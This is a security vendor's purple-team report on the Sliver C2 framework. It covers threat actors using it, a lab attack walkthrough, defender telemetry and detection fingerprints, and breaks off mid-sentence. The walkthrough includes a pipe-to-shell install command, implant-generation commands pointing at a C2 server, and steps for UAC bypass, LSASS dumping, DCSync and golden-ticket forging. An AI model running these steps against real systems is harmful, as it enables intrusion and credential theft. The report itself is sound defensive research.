{ "id": "f1a07eb3-c827-4653-b30c-039e5f607478", "created_at": "2026-04-06T00:22:22.048695Z", "updated_at": "2026-04-10T03:37:32.548598Z", "deleted_at": null, "sha1_hash": "2f1804f3ba7112c546ac39ca9576afb1bf2b4e91", "title": "Sliver C2 Leveraged by Many Threat Actors", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4675700, "plain_text": "Sliver C2 Leveraged by Many Threat Actors\r\nBy Cybereason Global SOC and Incident Response Team\r\nArchived: 2026-04-05 12:56:36 UTC\r\nWhat you need to know about this attack framework before it replaces Cobalt\r\nStrike\r\nThis particular Threat Analysis report is part of a series named “Purple Team Series”, covering widely used attack\r\ntechniques, how threat actors are leveraging them and how to detect their use.\r\nIntroduction\r\nCybereason’s GSOC and Incident Response teams have analyzed a growing C2 framework named Sliver and\r\ncreated by a cybersecurity company named Bishop Fox. C2 frameworks or Command and Control (C\u0026C)\r\ninfrastructure are used by security professionals (red teamers and pentesters) to remotely control compromised\r\nmachines during security assessments. They are also leveraged by threat actors for the same reason. \r\nFollowing this introduction, we describe in detail how this framework works, how to reproduce its use, how threat\r\nactors are leveraging it and how to implement detection and prevention mechanisms.\r\nAs always in this Purple Team series, the Cybereason GSOC covers the topic from different perspectives:\r\nDescription of the Sliver C2 framework\r\nRed team aspects - getting Sliver C2 on the test bench\r\nBlue team aspects - analyzing a past case of BumbleBee infection that led to the use of Sliver C2\r\nPurple team aspects - using blue and red knowledge, producing detections and analysis capabilities\r\nIn the following table, we created an index of the identified features of Sliver C2 and their corresponding section\r\nin the MITRE ATT\u0026CK framework:\r\nKey Points \r\nThe Cybereason GSOC team extracted the following key points from its research of Sliver C2: \r\nA new trend: Sliver C2 gets more and more traction from Threat Actors, often seen as an alternative from\r\nCobalt Striker.\r\nModular framework: Extension package manager (armory) allowing easy install (automatic compilation) of\r\nvarious 3rd party tools such as BOFs and .NET tooling like Ghostpack (Rubeus, Seatbelt, SharpUp,\r\nCertify, etc).\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 1 of 47\n\nAlready associated with known threat actors and malware families: BumbleBee loader infections are often\r\nfollowed by the loading of Sliver C2. Threat actors like APT29 are also known to leverage this framework.\r\nUnique network and system signatures: The detection of Sliver C2 is possible as this framework creates\r\nspecific signatures when executing Sliver-specific features. Detections and fingerprinting of the\r\ninfrastructure server also exists and are listed in this article.\r\nSliver C2 Description and Past Uses\r\nWhat is it?\r\nSliver is an open source cross-platform adversary emulation/red team framework. It’s designed to be scalable and\r\ncan be used by organizations of all sizes to perform security testing. \r\nSliver is comparable to Cobalt Strike or Metasploit. \r\nWhy is it Getting More Attraction ? \r\nSilver C2 is gaining popularity due to these reasons : \r\nOpen-source alternative to Cobalt Strike and Metasploit\r\nModularity of the platform with Armory \r\nCross-platform : OS X, Linux and Windows\r\nThe framework provides all core capabilities for adversary simulation and most notables are:\r\nDynamic code generation\r\nCompile-time obfuscation\r\nMultiplayer-mode\r\nStaged and Stageless payloads\r\nSecure C2 over mTLS, WireGuard, HTTP(S), and DNS\r\nWindows process migration, process injection, user token manipulation, etc.\r\nLet's Encrypt integration\r\nIn-memory .NET assembly execution\r\nCOFF/BOF in-memory loader\r\nTCP and named pipe pivots\r\nArmory, alias and extension package manager\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 2 of 47\n\nIn the Red team section, we analyze how Sliver C2 can be leveraged in a real-life attack scenario.\r\nThreat Actors Leveraging Sliver C2\r\nSilver C2 is getting more and more traction since its release in 2020. As of today, the number of threat intelligence\r\nreports is still low and the main reports describe the use of the Russian SVR leveraging Sliver C2. \r\nRecently, some threat research teams, including the Cybereason GSOC, identified cases of BumbleBee loaders\r\ndropping Sliver C2 following the initial infection.\r\nSVR / APT29  (2021)\r\nThreat Actor  Malware Families Dates Links\r\nAPT29 / SVR / Cozy Bear / the Duke N/A May 2021 NCSC\r\nThe threat actor called APT29, associated with Russian secret services, has been reported by different\r\norganizations, using Sliver C2 to ensure persistence on a compromised network.\r\nAccording to this report, by the National Cyber Security Centre (NCSC), the use of the Sliver C2 was “likely an\r\nattempt to ensure access to a number of the existing WellMess and WellMail victims was maintained”. \r\nIn this specific case, the SVR operators used a specific Sliver C2 infrastructure server for each compromise.\r\nTA551 / Shathak (2021)\r\nThreat Actor  Malware Families Dates Links\r\nTA551 / Shathak N/A October 2021 Proofpoint\r\nSecurity researchers  from the company ProofPoint identified emails with attached Microsoft Office documents,\r\ncontaining malicious macros, that if enabled,  lead to the deployment of the Sliver C2 framework.\r\nTA551 has been previously associated with distributing malware families such as Ursnif, IcedID, QBot/Qakbot,\r\netc.\r\nIn this case, Sliver was directly loaded after the initial infection vector, unlike previous cases involving TA551\r\nwhere frameworks such as  Cobalt Strike were loaded a second time following the initial infection. This use of\r\nSliver gave the threat actor much more flexibility.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 3 of 47\n\nExotic Lily  (2022)\r\nThreat Actor  Malware Families Dates Link\r\nExotic Lily BumbleBee Loader 2022 Cybereason\r\nThe Cybereason GSOC team has previously reported on BumbleBee loader infections leading to the deployment\r\nof a C2 framework.\r\nRecently, the Cybereason GSOC team observed a typical BumbleBee loader infection, starting from a LNK\r\ninfection vector, ultimately leading to the deployment of Sliver C2 in order for the threat actor to obtain\r\npersistence on the network.\r\nIn this chapter, we describe the attack path employed by the threat actors.\r\nThe Cybereason GSOC drafted the following timeline: \r\nActivities Time\r\nInitial access with BumbleBee Loader T0\r\nReconnaissance / tasklist T0 + 2 minutes\r\nCommand and Control / Sliver C2  T0 + 11 minutes\r\nCommand and Control / Sliver C2 Shell feature T0 + 41 minutes\r\nReconnaissance / whoami T0 + 42 minutes\r\nThe scenario in itself is stopped almost at its beginning, due to a user intervention and the attack detection.\r\nRed Team - Discovering and Using the Sliver C2 Framework \r\nSliver is designed as a second stage payload which, after deployment, gives the threat actor full access to the\r\ntarget system and ability to conduct next steps in the attack chain. \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 4 of 47\n\nSliver Framework architecture\r\nThere are four major components to the Sliver C2 ecosystem:\r\nServer Console - The server console is the main interface, which is started when you run the sliver-server\r\nexecutable. The server console is a superset of the client console. All code is shared between the\r\nclient/server consoles except server-specific commands related to client (operator) management. The server\r\nconsole communicates over an gRPC interface to the server.\r\nSliver C2 Server - The Sliver C2 server is also part of the sliver-server executable and manages the internal\r\ndatabase, starts and stops network listeners. The main interface used to interact with the server is the gRPC\r\ninterface, through which all functionality is implemented. \r\nClient Console - The client console is the primary user interface that is used to interact with the Sliver C2\r\nserver. \r\nImplant - The implant is the actual malicious code run on the target system you want remote access to.\r\nWe describe the relations between each component through the following diagram, putting the Sliver C2 server at\r\nthe center of the exchanges and for the attacker to use for remote management.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 5 of 47\n\nSliver C2 various components and their interaction, as explained in the above paragraph\r\nHow to Use  Sliver C2 ?\r\nInstallation\r\nFramework base installation is easy and consist of downloading and running a bash script: curl\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 6 of 47\n\nhttps://sliver.sh/install | sudo bash\r\nCybereason GSOC has analyzed the script and following actions are performed as of the publication of this\r\nanalysis:\r\nInstalling following dependencies, gpg, curl, build-essential, mingw-w64, binutils-mingw-w64, g++-\r\nmingw-w64, (mainly related to the compilation)\r\nDownload from release page Sliver C2 binaries and verify the integrity\r\nInstall systemd service for Sliver C2 to run as system service (daemon)\r\nGenerate client configuration for all users on the system in order to allow them to connect and conduct an\r\nattack campaign in parallel.\r\nSliver server running as a system service is giving the ability for multiple operators to connect.\r\nSliver implants support two modes of operation: \r\nBeacon mode - beacon mode implements an asynchronous communication style where the implant\r\nperiodically checks in with the server, retrieves tasks, executes them, and returns the results. \r\nSession mode - in session mode the implant will create an interactive real time session using either a\r\npersistent connection or using long polling depending on the underlying C2 protocol.\r\nImplant\r\nSliver C2 implants are cross-platform, you can change the compiler target with the --os flag. Sliver accepts any\r\nGolang GOOS and GOARCH as arguments --os and --arch.\r\nWe generated implants for Linux, Mac and Windows with following commands:\r\ngenerate --mtls [C2 Public IP]:443 --os linux --arch amd64\r\ngenerate --mtls [C2 Public IP]:443 --os mac --arch arm64\r\ngenerate --mtls [C2 Public IP]:443 --os windows --arch amd64\r\nSliver C2 implants for different platforms (OS/Arch)\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 7 of 47\n\nThe command generate info can be used to list all supported compilation targets.\r\nListener\r\nBefore you can catch the shell, you'll first need to start a listener. The following protocols are supported:\r\nmTLS\r\nMutual Transport Layer Security (mTLS) is a process that establishes an encrypted TLS connection\r\nin which both parties use X. 509 digital certificates to authenticate each other\r\nHTTP\r\nHTTPS\r\nDNS \r\nWireguard\r\nListeners support both sessions and beacons callbacks. The implants in our example are generated for mTLS\r\nprotocol on port 443 and therefore we start the mTLS listener:\r\nStarting mTLS listener and displaying currently active listeners\r\nSessions\r\nAfter implant execution on target host a session is created:\r\nDisplaying current sessions\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 8 of 47\n\nThe command use with the session id provides interactive session with remote target: \r\n Interaction with session\r\nAt the time of writing this article Sliver interactive session provides the following commands:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 9 of 47\n\nThe list of supported commands in session mode\r\nArmory\r\nThe armory is the Sliver Alias and Extension package manager, which allows you to automatically install various\r\n3rd party tools such as BOFs and .NET tooling. The list of tools is available on Github. It is also possible to install\r\npackages in bundles.\r\nUsing Sliver C2 to Create a Complete Attack Path\r\nIn this section, we will explore the different features offered by Sliver, used in a logical order for an attacker, from\r\ninitial infection to domain administration escalation and data exfiltration. In the Blue team section, those will be\r\nanalyzed from the Defender perspective. \r\nThis will help us to create detection rules, described in the Purple team section.\r\nSliver C2 implant is designed to be used as  a second stage payload (not leveraged during the initial infection step)\r\nafter the attacker has gained access to the target system using an initial infection vector such as for example -\r\nphishing, drive by download, exploitation of unpatched vulnerabilities to get deployed on the target system. \r\nThis part is out of the scope for this article and therefore we executed the implant directly on the target system.\r\nWe presented the attack scenario following MITRE tactic order, and introducing each Sliver C2 feature as a “link”\r\nof the attack chain. \r\nTarget organization is composed of three assets : \r\nA workstation, in the workstation network zone\r\nA server, hosted in the DMZ network zone\r\nA domain controller, in the server network zone.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 10 of 47\n\nDifferent stages of the attack and Sliver C2 command and features : Execution, Privilege Escalation, Persistence,\r\nCredential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration\r\nExecution \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 11 of 47\n\nSilver C2 implant is executed on the workstation as stage 2 payload and from Sliver C2 server we get a shell\r\nsession, this session provides multiple methods to execute commands and other scripts or binaries.\r\nRed team - Shell Command\r\nSliver C2 session has a built-in command shell to spawn a powershell command prompt. However this is\r\nconsidered as bad practice and will leave obvious logs on  the target system for detections. \r\nObtaining Powershell prompt from Sliver C2\r\nRed team - Execute Command\r\nThe preferred method to execute a program on target is execute command which can also capture the output. \r\nUsing Sliver C2 built-in execute command\r\nRunAs\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 12 of 47\n\nRun a new process in the context of the designated user (Windows Only).\r\nRunning ipconfig command as localAdmin user\r\nPrivilege Escalation\r\nWe obtain access on a workstation, with an account that is part of the “administrators” local group. However, we\r\nneed to elevate the process to NT Authority/System, enabling us to do high-privileges actions like process memory\r\ndumps.\r\nUAC Bypass\r\nUser Account Control bypass can be done using multiple available techniques. For this purpose we use cmstp.exe\r\nwhich is windows system binary. The details and the source code for the exploit are available here.\r\nUAC bypass exploit source files\r\nNext, we upload the files to the victim machine and execute the powershell script to return a new session with\r\nUAC bypass.\r\nExecution of UAC bypass exploit\r\nGetsystem\r\nAfter UAC bypass we are able to use the built in getsystem command to spawn a new Sliver session as the NT\r\nAUTHORITY\\SYSTEM user.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 13 of 47\n\nExecuting built in getsystem command\r\nTesting newly obtained privileges shows indeed the current user as NT AUTHORITY\\SYSTEM.\r\nSession user after getsystem command\r\nDefense Evasion \r\nThis section describes the features of Sliver C2 implant used to avoid detections.\r\nMigrate\r\nWe use built-in migrate command to hide Sliver C2 implant into another remote process for defense evasion\r\npurposes.\r\nUsing Sliver C2 migrate command\r\nCredential Access\r\nWith obtained privileges, we use the built-in procdump command to dump the “lsass.exe” process memory and\r\nretrieve credentials offline on Sliver C2. \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 14 of 47\n\nDumping lsass.exe memory with built-in procdump command\r\nOffline reading of the memory dump on Linux (Sliver C2 server) can be done using pypykatz.\r\nPypykatz reading lsass.exe memory dump (complete output omitted)\r\nWe are able to obtain the password of a logged in user (STAGEZERO\\alon). \r\nDiscovery \r\nIn this stage we use Sliver C2 to get information about Active Directory as well as discover new machines to pivot\r\nto.\r\nNetwork Scan\r\nWe use Sliver C2 interactive shell to run powershell commands, following command is scanning the network to\r\ndiscover live hosts.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 15 of 47\n\nNetwork scan from Sliver C2 shell\r\nThe live host with IP address 10.0.2.10 will be our target for the lateral movement.\r\nRetrieving the hostname of 10.0.2.10\r\nThe FQDN of 10.0.2.10 in STAGEZERO domain is s1-confluence.stagezero.lab.\r\nActive Directory Discovery\r\nWe use Windows system binaries with the Sliver C2 built-in execute command for Active Directory discovery.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 16 of 47\n\nUsing net to discover STAGEZERO domain administrators\r\nUsing nltest to discovering STAGEZERO domain controllers\r\nLateral Movement\r\nDuring the credentials access stage we obtained the credentials for STAGEZERO\\alon user and in discovery stage\r\nwe found another host, s1-confluence.stagezero.lab. This information will be used for lateral movement.\r\nPsExec\r\nWe leverage Sliver C2 built-in psexec command to achieve lateral movement:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 17 of 47\n\nLateral movement to s1-confluence server\r\nOn this new machine we perform the same actions (a process dump of the lsass.exe process memory, pypykatz\r\noffline launch) to access credentials. \r\nThese steps give us access to the user stagezero_adm which, we know from Active Directory discovery, is a\r\ndomain administrator account.\r\nStagezero_adm account credentials\r\nWith domain administrator credentials we will forge a Kerberos Golden ticket in order to obtain full access to all\r\ndomain joined systems. We leverage Rubeus, installed from Sliver C2 Armory, to obtain a Kerberos TGT to\r\nauthenticate as stagezero_adm.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 18 of 47\n\nUsing Rubeus to get TGT for stagezero_adm account\r\nWe use the Kerberos TGT ticket or obtained credentials from offline memory dump with psexec command to\r\nmove laterally to the domain controller (DC-1).\r\nIn order to forge a Kerberos Golden Ticket we upload Mimikatz latest release to the DC-1 machine with Sliver C2\r\nbuilt-in upload command, unzip the archive and execute Mimikatz binary.\r\nUpload and unzip Mimikatz on target machine\r\nWe use the Mimikatz dcsync command to obtain the krbtgt account password hash which is used to sign Kerberos\r\ntickets.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 19 of 47\n\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 20 of 47\n\nObtaining krbtgt account password hash\r\nKerberos Golden ticket can be obtained using Rubeus through the Sliver C2 implant:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 21 of 47\n\nForging Kerberos Golden Ticket with Rubeus\r\nThis grants us the Domain Administrator privileges and represents full domain compromise by the attacker.\r\nCollection \u0026 Exfiltration\r\nIn this section we use Sliver C2 features to access target internal systems.\r\nSocks Proxy \r\nSliver C2 has SOCKS5 built-in command to open a proxy, this proxy facilitates communication with internal\r\nservers by routing network traffic to the actual server on behalf of a client (target machine with Sliver C2\r\nimplant).\r\nSetup SOCKS5 proxy with Sliver C2\r\nAfter configuring our navigator to use SOCKS proxy we can access internal resources of the compromised\r\ndomain.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 22 of 47\n\nAccessing s1-confluence server using SOCKS proxy\r\nWireguard\r\nSliver C2 offers another built-in method to access victims' networks, Wireguard VPN implant.\r\nSetup Sliver C2 Wireguard listener\r\nThe Endpoint setting must be configured to point to the Sliver C2 server's WireGuard listener, 40.88.146.221:999\r\nin our case.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 23 of 47\n\nRunningSliver C2 Wireguard implant\r\nAfter setting up the port forwarding with built-in “wg-portfwd add --remote 10.0.1.10:3389” we can access\r\nvictims' internal resources.\r\nRDP connection to victims internal server (DC-1)\r\nIn previous stages we used Sliver C2 to obtain multiple access (HTTP, RDP) to the victims internal network and\r\ndomain administrator credentials. We can now exfiltrate sensitive data from victims systems through the created\r\ntunnels or through the Sliver C2 Implants.\r\nBlue Team - Analysis of Sliver C2 Framework use \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 24 of 47\n\nIn this chapter, we put on the “Security analyst” hat and analyze the resulting telemetry collected during  our\r\nattack simulation using the Sliver C2 framework.\r\nThe article follows the same chronological order as the attack.\r\nAnalyzing the Produced Attack \r\nAs a reminder, our “victim” organization is composed of three assets : \r\nA workstation, in the workstation network zone,  which is the entry point of the attacker, through spear\r\nphishing\r\nA server, hosted in the DMZ network zone, which is used for documentation and hosts a Confluence\r\nservice\r\nA domain controller, in the server network zone.\r\nExecution and OS Discovery\r\nThe attacker first executes the Sliver beacon named nasty_roast.exe on the initial victim machine, a workstation. \r\nExecution of the Sliver C2 implant, under the name “NASTY_ROAST.exe”\r\nAnalyzing the nasty_roast.exe process further, we discover network connections to what seems to be the Sliver C2\r\nserver, on TCP port 8888 : \r\nNetwork connection to the Sliver C2\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 25 of 47\n\nThe attacker then executes whoami.exe /all from the beacon:\r\nCybereason Process Tree showing whoami.exe being spawned from nasty_roast.exe\r\nThis command displays the execution context of the user of the malicious implant.\r\nBlue team - Command Execution\r\nThe attacker continues its discovery through “net.exe” commands:\r\nNet.exe commands displaying the local administrator group content as well as the Active Directory “domain\r\nadmins” group\r\nPrivilege Escalation\r\nBlue Team - UAC Bypass \r\nThe first step needed for the attacker is to obtain NT\\System privileges. In order to obtain that privilege, the\r\nattacker needs to bypass User Account Control or “UAC”.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 26 of 47\n\nOn the lab environment,  the attacker compiles C# source code (.cs extension) which results in the file cmstp-uac-bypass.dll:\r\nEditing and compiling the DLL designed to bypass UAC\r\nThe attacker then executes a PowerShell script that leverages the produced DLL, through the command\r\npowershell C:\\Users\\[..]\\Documents\\file\\uac.ps1:\r\nPowershell.exe spawned from the Sliver C2 implant, creating a cmstp.exe process\r\nThis method allows the attacker to leverage cmstp.exe to bypass UAC on the machine.\r\nThe resulting command is : \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 27 of 47\n\n\"c:\\windows\\system32\\cmstp.exe\" /au C:\\windows\\temp\\y1zuhb4s.inf\r\nWe can observe that the DLL is loaded reflectively in the powershell.exe process itself:\r\nLoaded modules of powershell.exe\r\nAs a result of the attacker executing this UAC Bypass, we identify a newly created “nasty_roast.exe” process,\r\nwith “dllhost.exe” as a parent:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 28 of 47\n\nProcess “nasty_roast.exe” in an elevated state\r\nOne can notice the attribute “Elevated child process privileges”, resulting from the process elevation.\r\nThe attacker follows this step with another whoami.exe /all command. But this process still runs under the user\r\naccount and not NT\\System.\r\nThe next logical step is for the attacker to execute the “GetSystem” Sliver C2 command to attain System privileges\r\non the victim machine, which results in the injection of the spoolsv.exe process: \r\nInjection to spoolsv.exe, with “system” privileges\r\nAs a result, we identify a chain of injections to the spoolsv.exe process, executed in the NT\\System user context.\r\nThe attacker follows spoolsv.exe injection with another whoami /all command to verify its permissions.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 29 of 47\n\nThe injection function is marked as “CreateRemoteThread”, indicating that the Sliver C2 implant is creating a\r\nremote thread in spoolsv.exe.\r\nWe observe later the user of the “Shell” feature of Sliver C2, spawning powershell.exe in a unique fashion:\r\nExecution of powershell.exe with specific argument, unique to Sliver C2\r\nAs this is unique to Sliver C2, this can be used for a detection, later in the article.\r\nCredential Access\r\nNow that the attacker obtains full user privileges, he will proceed to gather user accounts on the machine. \r\nBlue Team - Execute-Assembly\r\nThe attacker leverages the “Execute-Assembly” Silver C2 feature to interrogate the domain controller LDAP\r\nservice:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 30 of 47\n\nInjection from spoolsv.exe to notepad.exe, connecting to the domain controller on TCP port 389 (LDAP)\r\nThe analysis shows that, by default, Sliver C2 implants will create notepad.exe processes and inject into them\r\nwhen using such feature.\r\nBlue Team - LSASS Dump\r\nFollowing this activity, the attacker attempts another method to steal user credentials from the victim machine.\r\nThe attacker executes a memory dump of the lsass.exe process:\r\nCreation of a MalOp and a process tree new item following the memory dump of lsass.exe\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 31 of 47\n\nThe attacker then analyzes the memory dump from the host itself, leveraging mimikatz.exe:\r\nMimikatz.exe execution\r\nAt this point, the attacker possesses accounts of the local user and domain users actively connected to the victim\r\nmachine.\r\nDiscovery\r\nThe attacker leverages powershell.exe to scan the internal network through the following command :\r\npowershell \"5..15 | ForEach-Object {Get-WmiObject Win32_PingStatus -Filter Address=10.0.2.$_\" and\r\nTimeout=200 and ResolveAddressNames=true and \"StatusCode=0 | select ProtocolAddress*}\"\r\nAttacker then uses Windows system binaries (net.exe, nltest.exe) to get Active Directory information discovery\r\ncommands:\r\nActive Directory discovery\r\nLateral Movement\r\nFollowing the discovery and credential theft activities, the attacker now progresses to the other assets discovered.\r\nFrom the Workstation to the DMZ Server\r\nThe attacker remotely creates a service on the server, under the machine’s system privileges : \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 32 of 47\n\nFirst, the attacker remotely starts a service on the server from the workstation through the\r\nRCreateServiceW function of the Microsoft Remote Procedure Call (RPC) technology for distributed\r\nnetworks:\r\nThis MSRPC indicated the creation of a remote service from alon-wks to s1-confluence.stagezero.lab\r\nThen, we observe the creation of a new process, corresponding to the Sliver C2 implant, spawned by\r\nservices.exe on the s1-confluence server:\r\nRemote creation and starting of the the “pentest2” service, executing a randomly generated process\r\n(wehsbmf4im.exe)\r\nThe created remote service defaults with the name “Sliver”. In that case, the attacker changes it on purpose to\r\n“pentest2”. \r\nBlue Team - Lateral Movement through PsExec\r\nThis action results from the use of the “PsExec” remote command of Sliver C2, creating an implant executable\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 33 of 47\n\nwith a randomly generated name. In that case, the path is c:\\windows\\temp\\wehsbmf4im.exe).\r\nAs like the other implants on the workstation, this implant also communicates with the Sliver C2 server\r\ninfrastructure, on TCP port 8888.\r\nFollowing the lateral movement, the attacker again checks his user privileges through the whoami /all command. \r\nFollowing this action, another injection to notepad.exe relates to the use of the Sliver C2 “Execute-Assembly”\r\nfunction.\r\nHe also executes the command “nltest /dclist” to identify the name of the domain controller, which is probably\r\ngoing to be his next target.\r\nThe created and injected notepad.exe process contains a module named Rubeus: \r\nLoaded processes of notepad.exe, showing again the use of Execute-Assembly\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 34 of 47\n\nRubeus is a C# program used for raw Kerberos interaction and abuses. In that case, it is used to interact with the\r\ndomain controller.\r\nOn top of using Rubeus, the attacker also leverages another memory dump of lsass.exe, directly from the implant\r\nprocess: \r\nSuspicions around the process wehsbmf4im.exe (Sliver C2 implant remotely deployed on the server), showing the\r\nmemory dump of lsass.exe\r\nThe use of Rubeus indicates a potential Kerberos ticket manipulation in order to reuse the stolen accounts with a\r\npass-the-ticket attack.\r\nThe fact that a session was established while the attack was ongoing shows that the domain administration\r\nprivileges were obtained by the attacker:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 35 of 47\n\nLogon Session established with the domain administrator account \r\nFrom the DMZ Server to the Domain Controller\r\nIn order to control the domain controller (dc-1), the attacker targets it through the use, again, of the PsExec\r\nmethod: \r\nFile event showing the creation of another remote service on the domain controller\r\nAt this point, the attacker controls the domain controller of the environment.\r\nOn the domain controller, the attacker executes similar actions as on the server and workstation previously: \r\nInjection to notepad.exe indicating the use of Silver C2 armory modules with the Execute-Assembly\r\nmethod\r\nRubeus use through the Execute-Assembly feature \r\nLaunch of mimikatz.exe through the Shell feature of Sliver C2\r\nCreation and manipulation of Kerberos tickets\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 36 of 47\n\nLSASS memory dump for credential theft\r\nFile event indicating the file manipulation of Kerberos tickets\r\nThe attacker finally leverages the “DCSync” feature of Mimikatz to impersonate a domain controller in order to\r\nsteal the credential database :\r\nThis MSRPC shows the use of Domain Controller replication, that can be abused in stealing AD credentials\r\nCollection\r\nAs the attacker prepares for data exfiltration the, we detect new activities including the spawning of another Sliver\r\nC2 implant under the process necessary_eviction.exe (random name generated by Sliver C2).\r\nFirst, the attacker drops the new generated implant, as shown in the following file event: \r\nFile event indicating the drop of a new executable (Sliver C2 implant)\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 37 of 47\n\nThen, the attacker executes the file :\r\nNew implant executed on the domain controller\r\nThis time, the attacker configured the implant to reach the Sliver C2 server infrastructure through the UDP port\r\n999 (non-default port, the default one is 51820):\r\nUDP Connection to the Sliver C2 server\r\nAt this stage any analyst familiar with the Sliver C2 framework would surmise that the only network protocol\r\nused by the framework that uses UDP is the WireGuard protocol fits this behavior. On the Sliver C2 project wiki,\r\na page clarifies the use of port forwarding and indicates that Wireguard should be used for better remote access to\r\nthe internal network: \r\nhttps://github.com/BishopFox/sliver/wiki/Port-Forwarding\r\nFollowing the WireGuard implant creation, the attacker initiates connection to the RDP service of the DMZ server\r\n(s1-confluence), as shown in the connection screen: \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 38 of 47\n\nConnection screen showing TCP connection on the 3389 port (RDP) of the DMZ server\r\nThis connection was created through the use of the WireGuard port forwarding feature of Sliver C2.\r\nInterestingly enough, we also identified the initial implant, fnhoczptph.exe,  showing proxy activity to target the\r\nConfluence port of s1-confluence DMZ server: \r\nThis shows the attacker exfiltrating data from the internal Confluence server\r\nPurple team - Detection and Hunting strategies for Sliver C2\r\nIn this section, we list tools and techniques in order to detect the use of Sliver C2 Framework.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 39 of 47\n\nHunting for Sliver Infrastructure \r\nWe can identify suspicious processes with connections to external servers that are likely to be part of a Sliver C2\r\ninfrastructure. In this section, we will list all the methods we discovered so far.\r\nTLS Certificates and JARM hashes\r\nJARM is an active Transport Layer Security (TLS) server fingerprinting tool.\r\nAs stated by Salesforce, initiator of this fingerprinting tool, scanning with JARM provides the ability to identify\r\nand group malicious servers on the Internet.\r\nSimilar to Cobalt Strike, we identified that Sliver C2, by default, will generate a TLS configuration that is typical\r\nfor Sliver as outlined by this article from Microsoft's Threat Intel team \r\nWhen trying to fingerprint our C2 server’s TLS service (configured with mTLS beacon communication), we\r\nindeed identify this hash:\r\nSalesforce JARM tool launched against a Sliver C2 \r\nThat means that if there is a suspicious connection from a process on a machine, one can identify that it is a Sliver\r\nC2 server through its JARM hash.\r\nThe following values can be used to decide if it’s a Sliver C2 infrastructure:\r\nHTTPS 3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910\r\nMTLS 00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01\r\nOne has to be careful though, as this JARM hash can be shared with other non-Sliver C2 servers. This check has\r\nto be specific to when there is a suspicion of a C2, not the other way around (looking for Sliver C2 in a large\r\ndataset of TLS server).\r\nDetection Logic \r\nProcess has network connections with a SSL/TLS service that has a JARM hash of\r\n3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910 OR \r\n00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01\r\nWeb Server Headers (HTTP) \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 40 of 47\n\nThis detection logic only works when the beacon configuration mode is HTTPS, and does not work for mTLS.\r\nAfter setting up an HTTPS listener on the Sliver C2 server, we reach out through the openssl command: \r\nOpenssl tool to connect to the Sliver C2 HTTPS listener\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 41 of 47\n\nWe can observe that the certificate chain is particular and can help identifying Sliver C2 (use of US cities in\r\nconjunction with “CN = localhost”).\r\nUpon requesting the “/” web path, we obtain the familiar “404 Not Found” message, without clear 